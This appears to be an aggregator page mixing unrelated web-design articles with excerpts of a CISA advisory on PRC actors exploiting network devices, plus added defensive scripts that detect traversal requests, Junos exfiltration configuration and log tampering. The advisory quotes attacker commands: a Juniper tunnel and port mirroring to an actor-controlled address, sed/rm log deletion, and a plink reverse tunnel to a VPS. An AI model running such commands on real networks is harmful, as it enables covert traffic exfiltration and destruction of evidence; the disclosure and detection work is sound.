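Both the Citrix CVE-2019-19781 entry (Table 5) and the Pulse CVE-2019-11510 entry (Table 11) describe directory traversal and recommend detecting "/../" attempts against the appliance. The following script is an added example, not part of the advisory or of the CISA, Citrix or Nmap tools it cites: it scans access-log lines in Apache/NGINX "combined" format, percent-decodes the request path repeatedly so that `%2e%2e` and double-encoded `%252e%252e` are seen as `..`, and reports two tiers. Browsers resolve `..` before sending a request, so any literal dot-dot segment reaching the server was crafted by the client and is reported even when it does not climb above the web root; a segment that does climb above the root is reported separately. The log lines, paths and 198.51.100.x client addresses are constructed.

```python
"""Scan access-log lines for directory-traversal attempts in the request path.

Added example, not part of the advisory. SAMPLE_LOG, its paths and the
198.51.100.x client addresses are constructed; the format assumed is the
Apache/NGINX 'combined' log format.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+'
)


def fully_decode(s: str, max_rounds: int = 3) -> Tuple[str, int]:
    """Percent-decode until the text stops changing; returns (text, rounds applied).
    The bound keeps pathological input from looping forever."""
    rounds = 0
    for _ in range(max_rounds):
        d = unquote(s)
        if d == s:
            break
        s, rounds = d, rounds + 1
    return s, rounds


def escapes_root(segments: List[str]) -> bool:
    """Walk the path as a server would and report whether '..' ever climbs above '/'."""
    depth = 0
    for seg in segments:
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def traversal_tags(target: str) -> List[str]:
    """Tags for one request target; only the path is examined, not the query string."""
    path = target.split("?", 1)[0]
    decoded, rounds = fully_decode(path)
    segments = decoded.replace("\\", "/").split("/")   # some servers accept '\' as well
    tags = []
    if ".." in segments:
        tags.append("dot-dot-segment")          # never sent by a browser; client-crafted
        if escapes_root(segments):
            tags.append("escapes-webroot")      # classic ../../etc/passwd style
        if rounds > 1:
            tags.append("double-encoded")       # %252e%252e, aimed at a decode-then-check bug
    return tags


def scan_access_log(lines: List[str]) -> Dict[str, object]:
    """Return {'findings': [...], 'unparsed': n}; unparsed lines are counted, not dropped silently."""
    findings, unparsed = [], 0
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            unparsed += 1
            continue
        tags = traversal_tags(m.group("target"))
        if tags:
            findings.append({"ip": m.group("ip"), "status": m.group("status"),
                             "target": m.group("target"), "tags": tags})
    return {"findings": findings, "unparsed": unparsed}


# Constructed sample: one benign request, three traversal attempts of increasing
# evasion, a benign query string containing '..', and one malformed line.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jan/2020:08:01:02 +0000] "GET /vpn/index.html HTTP/1.1" 200 1543 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Jan/2020:08:02:10 +0000] "GET /vpn/../restricted/config.xml HTTP/1.1" 200 812 "-" "curl/7.64.1"',
    '198.51.100.9 - - [10/Jan/2020:08:02:11 +0000] "GET /images/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 0 "-" "curl/7.64.1"',
    '198.51.100.12 - - [10/Jan/2020:08:03:00 +0000] "POST /api/%252e%252e/%252e%252e/admin HTTP/1.1" 403 0 "-" "python-requests/2.22"',
    '198.51.100.3 - - [10/Jan/2020:08:04:00 +0000] "GET /static/app.js?v=1..2 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    'garbage line that is not a request record',
]

if __name__ == "__main__":
    result = scan_access_log(SAMPLE_LOG)
    for f in result["findings"]:
        print(f["ip"], f["status"], ",".join(f["tags"]), f["target"])
    print("unparsed lines:", result["unparsed"])
```

A 200 status on a dot-dot request is the line to escalate first: the server served something for a path no browser would send. The status code is carried in each finding for that reason, and the benign `v=1..2` query string shows why only the path component is examined.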
Table 12: Information on Pulse CVE-2021-22893
Table 13: Information on QNAP CVE-2019-7192
QNAP CVE-2019-7192 CVSS 3.0: 9.8 (Critical)
Vulnerability Description
This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommends updating Photo Station to the latest versions.
Recommended Mitigations
Update Photo Station to versions:
- QTS 4.4.1: Photo Station 6.0.3 and later
- QTS 4.3.4 to QTS 4.4.0: Photo Station 5.7.10 and later
- QTS 4.3.0 to QTS 4.3.3: Photo Station 5.4.9 and later
- QTS 4.2.6: Photo Station 5.2.11 and later
Detection Methods
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station releases earlier than the fixed versions listed above (5.2.11, 5.4.9, 5.7.10, and 6.0.3 for the respective QTS branches).
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 14: Information on QNAP CVE-2019-7193
Table 15: Information on QNAP CVE-2019-7194
QNAP CVE-2019-7194 CVSS 3.0: 9.8 (Critical)
Vulnerability Description
This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommends updating Photo Station to the latest versions.
Recommended Mitigations
Update Photo Station to versions:
- QTS 4.4.1: Photo Station 6.0.3 and later
- QTS 4.3.4 to QTS 4.4.0: Photo Station 5.7.10 and later
- QTS 4.3.0 to QTS 4.3.3: Photo Station 5.4.9 and later
- QTS 4.2.6: Photo Station 5.2.11 and later
Detection Methods
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station releases earlier than the fixed versions listed above (5.2.11, 5.4.9, 5.7.10, and 6.0.3 for the respective QTS branches).
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 16: Information on QNAP CVE-2019-7195
QNAP CVE-2019-7195 CVSS 3.0: 9.8 (Critical)
Vulnerability Description
This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommends updating Photo Station to the latest versions.
Recommended Mitigations
Update Photo Station to versions:
- QTS 4.4.1: Photo Station 6.0.3 and later
- QTS 4.3.4 to QTS 4.4.0: Photo Station 5.7.10 and later
- QTS 4.3.0 to QTS 4.3.3: Photo Station 5.4.9 and later
- QTS 4.2.6: Photo Station 5.2.11 and later
Detection Methods
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station releases earlier than the fixed versions listed above (5.2.11, 5.4.9, 5.7.10, and 6.0.3 for the respective QTS branches).
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 17: Information on Zyxel CVE-2020-29583
Revisions
- Initial Version: June 7, 2022
Article source: us-cert.gov
10 Dos and Don’Ts of Web Design in 2022
Navigating the world of web design can be difficult. There is so much conflicting and outdated advice.
How many times have you been advised to obey the 3-Click Rule? It states that users must reach the content they want in three clicks. But, according to the Nielsen Norman Group, no research supports the 3-Click Rule. It’s just a guess, the web’s equivalent of an urban myth.
There are dos and don’ts of effective web design in 2022. In this post, we’ll present the most important so that you can design websites with confidence.
Do: Make Use of Design Patterns
Design Patterns sound like a complex technique. All it means is copying standard, well-known approaches. Jakob’s Law says that most people spend most of their time on other sites, so they will understand your site better if it is like those other sites.
You can’t make your site like every other, so your job is to pick and choose which design patterns will be most helpful to your target demographic.
Some of the most recognized design patterns include placing the logo in the top left of the viewport, underlining links, and placing essentials like shipping information in the footer.
Do: Make It Inclusive
Inclusive design holds the opinion that the web is for everybody. It hasn’t always been that way. Just a few years ago, it was common to see sites excluding some demographics to reduce development costs.
Excluding anyone from your website is wrong. In many jurisdictions, it’s so wrong it’s illegal. But, perhaps more importantly, excluding 5% of users deducts 5% from your profits.
It’s never been easier to be inclusive. The first step is to make your website responsive so that it caters to every device. Then, follow accessibility guidelines to ensure that you welcome everyone. Finally, be ready to listen to your users, and adapt to their needs.
Do: Keep It Simple
As a website designer, you’ve undoubtedly looked in envy at some of the more original sites out there. It’s important to remember that many of the most experimental sites are usually targeting other designers. Something that works well on a portfolio site won’t translate well to a local convenience store.
99 times out of 100, the simple choice is the right choice. Most people aren’t interested in an original design. They’re interested in accomplishing a task. The less effort expended to complete the task, the better the experience.
Complexity most often creeps into navigation. Start with a logical structure, and use simple, hierarchical navigation.
Do: Stay Focussed
Every website has goals. It might be promotion, profit, utility, or a combination. Each part of that website, every single page, should have one goal.
Hick’s Law says that the time it takes to make a decision increases when there are more choices. And the Goal-Gradient Effect says that a customer is more likely to complete a process the closer they are to the completion. Combine the two, and it means that giving users one CTA (call to action) on a page increases the chances of them taking it.
It’s OK to still have navigation, links, and secondary goals provided each page has a single clear purpose.
Do: Keep Your UI Consistent
Consistency is often referred to as the hallmark of quality. It means that you’ve paid attention to details. But consistency isn’t just about giving a good impression. Consistency is also essential for good UX (user experience).
Users learn to navigate your website as they go. They learn your website’s ‘rules’ or the logic as they interact with it. If your UI (user interface) is consistent, they’ll learn the rules faster and feel more confident.
Areas that often fail the consistency test are the corner radius of boxes, the style of links, and the tone of writing.
Don’t: Ignore Aesthetics
Design isn’t all about usability studies and reliance on design patterns. Design should also be beautiful.
Beauty is often seen as shallow and unimportant. However, the Aesthetic-Usability Effect states that a beautiful website is more likely to be seen as usable by customers.
A pretty design is a high-converting design.
To ensure your design is pretty, pay attention to your typography hierarchy, color scheme, and the symmetry of your layout.
Don’t: Make Users Wait
The worst thing you can do is make users wait. The more technology advances and the faster connections get, the higher user expectations climb.
Your site needs to load in under a second and be interactive in under two seconds. Otherwise, you’ll lose customers who bounce back to their search engine and try one of your competitors instead.
Delays don’t only apply to the speed of your site. You need to ensure that the information or product a customer wants is easy to access. Don’t bury it multiple levels deep in your site. If users are delayed by complicated navigation or unpredictable structure, they will exit your site as surely as if it took 10 seconds to load.
Users have zero amounts of patience.
Don’t: Block the Screen
Browsing through the web, the number of designers that block users from seeing the content on a website is astounding.
The most common culprits are newsletter subscription offers. How can a customer know whether they want to sign up for your newsletter when they haven’t yet seen your products?! Let the user browse your site, and then offer them a newsletter subscription.
Another common culprit is cookie notices. Most sites require a modest cookie notice to stay on the right side of the Law. And yet they display a huge, site-blocking modal as if the cookie notice were the most critical content on the site.
Don’t: Leave Content Until Last
Content is frequently left until last. That’s because it’s hard. Just because we learned to read and write as kids doesn’t mean we can write persuasive, engaging sales copy.
Content is vitally important for SEO (search engine optimization), but more importantly, it’s essential for CX (customer experience).
Most websites make three big mistakes with their content.
Mistake one is unbalanced copy. That means writing 25 words about your flagship product and 5,000 words about the company’s history.
Mistake two is writing for the company, not for the customer. That means organizing content around the company structure rather than customer tasks.
Mistake three is too much content at once. Walls of text are a turn-off. Instead, write short, scannable snippets that will keep customers engaged.
“Don’t try to be original… just try to be good.”
That quote is from the titan of twentieth-century design, Paul Rand.
It boils down to this: originality is about you, and quality is about the website. Great designers care more about their output than their reputation.
Featured image via Pexels.
Source
The post 10 Dos and Don’Ts of Web Design in 2022 first appeared on Webdesigner Depot.
Article source: Webdesignerdepot
Data Lineage Is Broken — Here Are 5 Ways to Fix It
News, IT process methods and organization
Data lineage isn’t new, but automation has finally made it accessible and scalable, to a certain extent.
In the old days (way back in the mid-2010s), lineage happened through a lot of manual work. This involved identifying data assets, tracking them to their ingestion sources, documenting those sources, mapping the path of data as it moved through various pipelines and stages of transformation, and pinpointing where the data was served up in dashboards and reports.
Article source: DZONE
Getting Started With Service Calls and Serverless Workflow
News, IT process methods and organization
Workflows are great for orchestrating services, functions, or events. They provide out-of-the-box features to make your applications resilient, reliable, and simple.
But currently, each cloud vendor has its own workflow solution: AWS has Step Functions, Google has Google Workflows, Microsoft has Azure Durable Functions, and so on. The lack of a common way to define workflows becomes an issue when you need to migrate your applications or host them on more than one cloud vendor. It also limits the potential for creating tools and infrastructure that support several platforms. This is what the Serverless Workflow specification addresses.
Article source: DZONE
Perfect CTA Placement: Above-The-Fold Vs. Below-The-Fold
News
As a website designer, your professional life revolves around crucial questions that might help you to deliver better results for your clients.
Which widgets are essential to driving conversions? What kind of checkout page elements do you need to include? Should there be a video or slideshow on that product page?
One of the biggest queries that we face when building landing pages to encourage sales is whether a CTA (call to action) button needs to be above or below the fold.
Answering the question: “Where should the CTA go?” correctly could make or break your client’s chances of a sale. Unfortunately, this particular concern has been the source of a raging debate for many years now. Everyone has their own opinion about CTAs and where they belong.
Today, we’re going to cover the benefits and issues with placing a CTA above the fold.
Should You Place a CTA Above the Fold?
Starting with a quick refresher, the term “above the fold” refers to any area of a website seen on a screen when a user arrives on a webpage. The content that appears above and below the fold may differ depending on the device you’re visiting a website with.
Experts in the design and digital marketing world have frequently claimed that if you want to get the best results with a CTA, you need to place it above the fold.
This strategy makes a lot of sense. If your CTA is above the fold, then your chances of it being seen are significantly higher. Some customers might not want to scroll to the bottom of a page to find out what they need to do next in their buyer journey.
Additionally, according to the Nielsen Norman Group, the 100 pixels just above the fold were viewed 102% more often than the pixels just below it. Eye-tracking studies show that, more often than not, you’ll get more engagement above the fold.
Just look at this landing page from Lyft, for instance, you immediately see what you need to do next:
It’s not just a single study that has touted the benefits of an above-the-fold CTA, either.
Another report into the “importance of being seen” found that above-the-fold ads and CTAs had a 73% rate of visibility compared to only 44% for those below the fold.
So, with stats like that to think about, why would you ever consider using a below-the-fold CTA?
When to Place a CTA Below the Fold
As with most things in web design, there is an exception to the rule.
Yes, above the fold, CTAs will be better for you most of the time. However, there are times when you might need to think outside of the box.
Most people think that placing a CTA below the fold practically guarantees that it won’t be seen. However, if you’re creating a website page or landing page that includes a lot of vital information, your audience will need to scroll.
For instance, if you’re creating a page where someone can download an app to engage with a business they already know about, it makes sense to speed the journey along with an above-the-fold CTA. However, if you’re trying to convince someone to sign up for your webinar, you might need to tell them what that webinar is all about first. That’s where a below-the-fold CTA comes in handy.
Customers might not have a lot of time in their busy schedules for scrolling these days. However, they still need the right information before they can make a decision about what to do next with your brand. According to Marketing Experiments, below the fold, CTA buttons can result in a 20% increase in conversions. However, this conversion boost only happens when you’re providing valuable, engaging, and persuasive content.
Check out this example from the Boston Globe, for instance:
The Fold Isn’t Everything in Web Design
The fold is often an essential consideration in web design.
However, it’s not all you need to think about when you’re deciding where to place sign-up forms and valuable CTA buttons.
According to the Nielsen Norman group, the content that appears at the top of the page will always influence user experience. However, that doesn’t mean that you need to place your CTA there. What you do need to do is ensure that whatever you have above the fold is promising enough to engage your visitor and make them scroll.
Put simply, what’s above and below the fold does matter, but your focus should be on taking advantage of customer motivation, rather than worrying exclusively about an imaginary line.
When deciding where a CTA belongs, you need to think about motivation.
How motivated is your prospect to click on a button? How desirable is your offering at that time, and how much does your visitor already know about the thing they’re being offered?
If you’re going to need to provide more information before your customer wants to convert, then a below-the-fold CTA makes more sense.
If you’ve already provided all the information your customer needs, and the prospect is arriving from an advertisement or another page on the website, then an above-the-fold CTA should work well.
The Truth About Designing for The Fold
The reality for web designers today is that achieving higher conversion rates doesn’t really have that much to do with whether a CTA is above or below the fold.
What’s important is whether your buttons come under the right amount of copy that answers the correct questions for an audience.
Remember, when visitors come to a website, they’re looking for different things. There are visitors that:
In some cases, you may even place multiple CTAs on the same page. Some people will have a general understanding of the technology and what it does. This means that they’ll be happy to click on the button above the fold.
On the other hand, there could also be visitors arriving on the same page that don’t understand what the benefits of real-time personalization are. This means that you need to elaborate a little on what you have to offer. A simple one-line explanation isn’t enough here.
Figuring Out Where to Place a CTA
Deciding where to place different elements of a website is a common challenge for web designers. Despite the many blogs out there that claim “above the fold” is always the best option for conversion rate optimization, the truth is a little more complicated.
The critical thing to remember as a web designer is that a CTA button asks a customer for commitment. Even if the CTA allows someone to download a free demo or sign-up for a newsletter without spending any money, it requires a customer to start a relationship with a brand.
In a world where customers are less trusting of companies than ever, it doesn’t make sense to push them into a relationship too quickly. Asking for a commitment from a target audience before they’ve had the chance to see what’s “in it for them” is not a good idea.
Jump in too quickly, and you’re likely to rub people the wrong way.
Go Out and Master the Fold
The issue for today’s designers isn’t figuring out whether a button needs to be visible from the moment someone arrives on a page. Instead, you need to think about whether visitors are finding the CTA at a time when they’re ready to take action.
You can only answer the question “where should the CTA go?” after you’ve carefully analyzed the project that you’re working on.
Remember, above the fold isn’t always the answer.
Featured image via Pexels.
Source
The post Perfect CTA Placement: Above-The-Fold Vs. Below-The-Fold first appeared on Webdesigner Depot.
Article source: Webdesignerdepot
How to Prevent Security Risks in the Private Cloud
News, IT process methods and organization
Organizations that want to use the cloud but don’t want to entrust their data to an external provider build their own on-premises cloud, also known as a private cloud. They build their own infrastructure, buy their own software, and build an in-house team to oversee everything. While the goal is to stay in control of your data, this approach is fraught with security threats and other pitfalls.
Haven’t you ever thought about migrating to the cloud? If you have already migrated to a private cloud environment, there are a few security risks in the private cloud that are considered critical.
Article source: DZONE
AA22-158A: People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices
Information security and IS security, Information security, Information system security
Original release date: June 7, 2022
Common vulnerabilities exploited by People’s Republic of China state-sponsored cyber actors
PRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.
Since 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors to gain access to victim accounts using publicly available exploit code against virtual private network (VPN) services [T1133] or public-facing applications [T1190]—without using their own distinctive or identifying malware—so long as the actors acted before victim organizations updated their systems.
PRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.
These cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders’ accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.
NSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.
Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors
Telecommunications and network service provider targeting
PRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The actors have utilized open-source router-specific software frameworks, RouterSploit and RouterScan [T1595.002], to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that allows scanning of IP addresses for vulnerabilities. These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.
Upon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [T1078] and utilized SQL commands to dump the credentials [T1555], which contained both cleartext and hashed passwords for user and administrative accounts.
Having gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [T1119]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off network to the actor’s infrastructure [TA0010]. The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.
Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [T1599], capture [T1020.001], and exfiltrate traffic out of the network to actor-controlled infrastructure.
While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:
set chassis network-services all-ethernet
set interfaces <interface-id> unit <unit number> tunnel source <local network IP address>
set interfaces <interface-id> unit <unit number> tunnel destination <actor controlled IP address>
After establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.
set routing-options static route <local network IP address> next-hop <actor controlled IP address>
PRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure.
set forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface <interface-id> next-hop <local network IP address>
set forwarding-options port-mirroring family inet output no-filter-check
set interfaces <interface-id> unit <unit number> family inet filter input <filter name>
set interfaces <interface-id> unit <unit number> family inet filter output <filter name>
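The three configuration steps above (tunnel, static route, port mirroring) leave a recognisable footprint in the running configuration. The following Python script is an added example, not part of the advisory, that audits a Junos "set"-format configuration (the output of `show configuration | display set`) for that footprint. The interface names, addresses, the sample configuration and the list of internal prefixes are constructed assumptions; `audit_config` and the finding names are chosen here.

```python
"""Audit a Junos 'set'-format configuration (the output of
'show configuration | display set') for the exfiltration footprint
described above: a tunnel whose destination lies outside the
organisation's address space, a static route towards that outside
next-hop, and port mirroring that copies every packet into the tunnel.
Added example, not part of the advisory; interface names, addresses and
the internal prefix list are constructed."""
import ipaddress
import re
from typing import List, Tuple

# Assumption: everything outside these prefixes is foreign to the network.
# On an edge router the default route legitimately points outside, so a
# real deployment would also allowlist the known upstream next-hops.
INTERNAL_PREFIXES = [ipaddress.ip_network(p)
                     for p in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

TUNNEL_DST = re.compile(r"^set interfaces (\S+) unit (\d+) tunnel destination (\S+)$")
STATIC_NH = re.compile(r"^set routing-options static route (\S+) next-hop (\S+)$")
MIRROR_RATE = re.compile(r"^set forwarding-options port-mirroring input rate (\d+)$")
MIRROR_OUT = re.compile(r"^set forwarding-options port-mirroring family inet output "
                        r"interface (\S+)(?: next-hop (\S+))?$")
NO_FILTER_CHECK = "set forwarding-options port-mirroring family inet output no-filter-check"
TUNNEL_IFACE_PREFIXES = ("gr-", "ip-")   # GRE and IP-over-IP tunnel interfaces

Finding = Tuple[str, str, str]            # (kind, subject, detail)


def is_internal(addr: str) -> bool:
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return True   # interface names, 'discard', 'reject' are not outside addresses
    return any(ip in net for net in INTERNAL_PREFIXES)


def audit_config(config: str) -> List[Finding]:
    """Return the suspicious statements found; an empty list means clean."""
    lines = [ln.strip() for ln in config.splitlines() if ln.strip()]

    # Pass 1: map logical tunnel interfaces (e.g. gr-0/0/0.0) to their destination,
    # so pass 2 can recognise a mirror output that lands in a tunnel regardless
    # of the order in which the statements appear.
    tunnels = {}
    for line in lines:
        m = TUNNEL_DST.match(line)
        if m:
            tunnels[f"{m.group(1)}.{m.group(2)}"] = m.group(3)

    findings: List[Finding] = []
    for line in lines:
        m = TUNNEL_DST.match(line)
        if m:
            if not is_internal(m.group(3)):
                findings.append(("tunnel-to-external", f"{m.group(1)}.{m.group(2)}", m.group(3)))
            continue
        m = STATIC_NH.match(line)
        if m:
            if not is_internal(m.group(2)):
                findings.append(("static-route-external-nexthop", m.group(1), m.group(2)))
            continue
        m = MIRROR_RATE.match(line)
        if m:
            if int(m.group(1)) == 1:          # rate 1 = mirror every packet, not a sample
                findings.append(("mirror-every-packet", "port-mirroring", line))
            continue
        m = MIRROR_OUT.match(line)
        if m:
            out_iface = m.group(1)
            if out_iface in tunnels or out_iface.startswith(TUNNEL_IFACE_PREFIXES):
                findings.append(("mirror-into-tunnel", out_iface,
                                 tunnels.get(out_iface, "unknown destination")))
            continue
        if line == NO_FILTER_CHECK:
            findings.append(("mirror-no-filter-check", "port-mirroring", line))
    return findings


# Constructed sample: the advisory's sequence filled in with made-up names and addresses.
SAMPLE_CONFIG = """
set chassis network-services all-ethernet
set interfaces gr-0/0/0 unit 0 tunnel source 10.20.30.1
set interfaces gr-0/0/0 unit 0 tunnel destination 203.0.113.45
set interfaces gr-0/0/0 unit 0 family inet address 10.99.99.1/30
set routing-options static route 10.99.99.0/30 next-hop 203.0.113.45
set forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface gr-0/0/0.0 next-hop 10.99.99.2
set forwarding-options port-mirroring family inet output no-filter-check
set interfaces ge-0/0/1 unit 0 family inet filter input mirror-all
set interfaces ge-0/0/1 unit 0 family inet filter output mirror-all
"""

if __name__ == "__main__":
    for kind, subject, detail in audit_config(SAMPLE_CONFIG):
        print(f"{kind:32} {subject:16} {detail}")
```

Run it against a configuration archive (or a config-diff feed) rather than a single snapshot: the valuable signal is the change that introduced a tunnel or a mirror, and who committed it.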
Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.
sed -i -e '/<REGEX>/d' <log filepath 2>
sed -i -e '/<REGEX>/d' <log filepath 3>
rm -f <log filepath 4>
rm -f <log filepath 5>
rm -f <log filepath 6>
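Local log deletion only destroys evidence if the device holds the sole copy of its logs. The Python below is an added example, not drawn from the advisory, that compares the log a remote syslog collector received with what remains on the device and reports the removed lines together with the users and source addresses they name. The Junos-style messages, hostnames, users and addresses are constructed, and the function names are chosen here.

```python
"""Compare the log a router still holds with the copy a remote syslog
collector received earlier.  Lines the collector has and the device lacks
are exactly what 'sed -i -e /<REGEX>/d' removed; a file that is gone
altogether is 'rm -f'.  Added example with constructed Junos-style
messages; not part of the advisory, and hostnames, users and addresses
are made up."""
import re
from collections import Counter
from typing import Dict, Iterable, List, Optional

# Constructed: what the collector received before the actor cleaned up.
COLLECTOR_COPY = [
    "Jun  7 10:14:58 core-rtr1 sshd[4102]: Accepted password for netops from 10.8.0.21 port 50122 ssh2",
    "Jun  7 10:15:01 core-rtr1 sshd[4188]: Accepted password for admin from 198.51.100.7 port 51234 ssh2",
    "Jun  7 10:15:09 core-rtr1 mgd[4190]: UI_CMDLINE_READ_LINE: User 'admin', command "
    "'set interfaces gr-0/0/0 unit 0 tunnel destination 203.0.113.45 '",
    "Jun  7 10:15:20 core-rtr1 mgd[4190]: UI_CMDLINE_READ_LINE: User 'admin', command "
    "'set forwarding-options port-mirroring family inet output interface gr-0/0/0.0 '",
    "Jun  7 10:15:31 core-rtr1 mgd[4190]: UI_COMMIT: User 'admin' requested 'commit' operation (comment: none)",
    "Jun  7 10:16:00 core-rtr1 sshd[4188]: Received disconnect from 198.51.100.7 port 51234",
    "Jun  7 10:20:00 core-rtr1 mgd[4402]: UI_LOGIN_EVENT: User 'netops' login, class 'j-super-user'",
]
# Constructed: the same file read back from the router afterwards.  The last
# line was written after the collector's snapshot and is not evidence of anything.
LOCAL_COPY = [
    COLLECTOR_COPY[0],
    COLLECTOR_COPY[6],
    "Jun  7 10:25:00 core-rtr1 sshd[4301]: Accepted password for netops from 10.8.0.21 port 50190 ssh2",
]

SRC_IP = re.compile(r"\bfrom (\d{1,3}(?:\.\d{1,3}){3})\b")
USER = re.compile(r"User '([^']+)'|\bfor (\S+) from\b")


def missing_from_local(collector: Iterable[str], local: Iterable[str]) -> List[str]:
    """Lines present in the collector copy but absent locally, in collector order.
    A Counter (not a set) keeps repeated identical lines honest."""
    remaining = Counter(local)
    missing = []
    for line in collector:
        if remaining[line] > 0:
            remaining[line] -= 1
        else:
            missing.append(line)
    return missing


def summarise(lines: Iterable[str]) -> Dict[str, Dict[str, int]]:
    """Users and source addresses named in the removed lines: an actor who
    scrubs logs usually scrubs its own session, so this points at it."""
    ips: Counter = Counter()
    users: Counter = Counter()
    for line in lines:
        for m in SRC_IP.finditer(line):
            ips[m.group(1)] += 1
        m = USER.search(line)
        if m:
            users[m.group(1) or m.group(2)] += 1
    return {"source_ips": dict(ips), "users": dict(users)}


def tamper_report(collector: List[str], local: Optional[List[str]]) -> dict:
    """local=None models a log file that no longer exists on the device."""
    if local is None:
        return {"status": "file-removed", "missing": list(collector),
                "summary": summarise(collector)}
    missing = missing_from_local(collector, local)
    return {"status": "tampered" if missing else "consistent",
            "missing": missing, "summary": summarise(missing)}


if __name__ == "__main__":
    result = tamper_report(COLLECTOR_COPY, LOCAL_COPY)
    print(result["status"], result["summary"])
    for line in result["missing"]:
        print("  removed:", line)
```

The comparison is only as good as the collector copy, which is why the forwarding has to be in place before the intrusion and the collector itself must not be reachable with the same credentials the actor harvested from RADIUS.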
PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [T1572] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [T1016.001] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to learn the victim network’s external public IP address.
plink.exe -N -R <local port>:<host 2>:<remote port> -pw <user defined password> -batch root@<VPS2> -P <remote SSH port>
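The Plink invocation above is recoverable from process-creation telemetry (Sysmon event 1, EDR command-line capture) if the arguments are actually parsed rather than grepped. The following Python is an added example, not from the advisory, that extracts the reverse-forward specification, the far-end VPS and port, and whether the password was passed inline with `-pw`, and scores each hit. The command lines, paths and addresses are constructed, and `parse_plink`, `risk` and `scan` are names chosen here.

```python
"""Recover the reverse-tunnel pattern above from process command lines
(Sysmon event 1 or EDR telemetry).  Tolerates either argument order and
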